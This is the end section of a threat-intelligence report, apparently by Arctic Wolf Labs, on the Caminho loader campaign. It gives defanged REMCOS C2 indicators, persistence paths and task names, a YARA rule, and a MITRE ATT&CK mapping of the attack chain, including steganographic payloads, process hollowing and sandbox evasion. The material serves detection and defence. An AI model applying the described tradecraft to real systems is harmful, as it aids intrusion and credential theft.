66.63.187[.]166 – AS214943 Railnet LLC (REMCOS RAT C2)

198.46.173[.]60 – Script hosting

File Paths:

C:\Users\Public\Downloads\panters.js – Persistence script

C:\Users\Public\Downloads\amandines – Alternate persistence location observed

Scheduled Tasks:

Task Name: amandes

Task Name: amandines

Action: Execute JavaScript from C:\Users\Public\Downloads\

Trigger: On system start, every 1 minute

Applied Countermeasures

Yara Rule

rule Caminho_Loader {
meta:
    description = "Rule for detecting Caminho Loader containing strings in Portuguese Language"     
    last_modified = "2025-07-16"
    author = "The Arctic Wolf Labs team"
    version = "1.0"
    sha256 = "c2bce00f20b3ac515f3ed3fd0352d203ba192779d6b84dbc215c3eec3a3ff19c"
strings:
    $a1 = "startupreg" ascii wide
    $a2 = "caminhovbs" ascii wide 
    $a3 = "namevbs" ascii wide 
    $a4 = "netframework" ascii wide
    $a5 = "nativo" ascii wide
    $a6 = "nomenativo" ascii wide
    $a7 = "persitencia" ascii wide
    $a8 = "caminho" ascii wide
    $a9 = "nomedoarquivo" ascii wide
    $a10 = "minutos" ascii wide
    $a11 = "startuptask" ascii wide
    $a12 = "taskname" ascii wide
condition:  
  (uint16(0) == 0x5A4D) and (filesize < 8MB) and (all of ($a*))
}

 

Detailed MITRE ATT&CK® Mapping

Tactic Technique Sub-Technique or Procedure / Context
Initial Access T1566 – Phishing T1566.001 – Spear-phishing Attachment: RAR/ZIP archives containing JavaScript or VBS files delivered via email with business-themed lures (invoices, quotations, urgent requests).
Execution T1059 – Command and Scripting Interpreter T1059.007 – JavaScript: Multi-stage JavaScript execution beginning with obfuscated .js files extracted from archives.
T1059.001 – PowerShell: Intermediate stage uses PowerShell for steganographic extraction and .NET assembly loading.
T1059.005 – Visual Basic: VBScript variants observed in some campaigns (HTA files).
T1204 – User Execution T1204.002 – Malicious File: Victim must manually extract and execute JavaScript/VBS from archive file.
Persistence T1053 – Scheduled Task/Job T1053.005 – Scheduled Task: Creates task named “amandes” or “amandines” executing JavaScript from C:\Users\Public\Downloads\ every minute on system start.
Defense Evasion T1027 – Obfuscated Files or Information T1027.003 – Steganography: LSB steganography conceals .NET payload within JPG/PNG image files hosted on archive.org.
T1027.010 – Command Obfuscation: Heavy JavaScript obfuscation using variable randomization and string encoding.
T1055 – Process Injection T1055.012 – Process Hollowing: Injects final payload into calc.exe or calc64.exe address space.
T1140 – Deobfuscate/Decode Files or Information Base64 decoding of URLs, payloads, and embedded scripts throughout execution chain.
T1497 – Virtualization/Sandbox Evasion T1497.001 – System Checks: Detects VMware, VirtualBox, Hyper-V, Cuckoo, sandbox environments, debugging tools.
T1036 – Masquerading T1036.005 – Match Legitimate Name or Location: Uses filename “Microsoft.Win32.TaskScheduler.dll” for malicious payloads.
T1070 – Indicator Removal T1070.004 – File Deletion: Fileless execution prevents file-based forensic artifact collection.
Credential Access (Varies by final payload) REMCOS RAT capabilities include credential harvesting; Katz Stealer explicitly designed for credential theft.
Discovery T1082 – System Information Discovery Checks system architecture (x86 vs x64) before payload execution.
T1518 – Software Discovery T1518.001 – Security Software Discovery: Detects presence of analysis tools and security products.
Collection (Varies by final payload) REMCOS RAT includes keylogging, screen capture, file collection capabilities.
Command and Control T1071 – Application Layer Protocol T1071.001 – Web Protocols: Uses HTTPS for payload retrieval from paste sites and archive.org.
T1573 – Encrypted Channel T1573.002 – Asymmetric Cryptography: REMCOS C2 implements encryption.
T1102 – Web Service T1102.001 – Dead Drop Resolver: Uses paste.ee and pastefy.app as staging for scripts and payloads.
T1102.002 – Bidirectional Communication: Uses archive.org for payload hosting.
Exfiltration (Varies by final payload) REMCOS and stealers exfiltrate data to C2 servers; Katz Stealer specifically targets credentials.

 

Examples of Image Containers Used in this Campaign*

*Screenshots are sanitized and non-malicious.

“Lost in space” wallpaper image

“MSI” wallpaper image

“MSI Pro wallpaper image”

“Optimized MSI Pro with B64” wallpaper image

About Arctic Wolf Labs

Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence and machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings.

Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.

Share this post: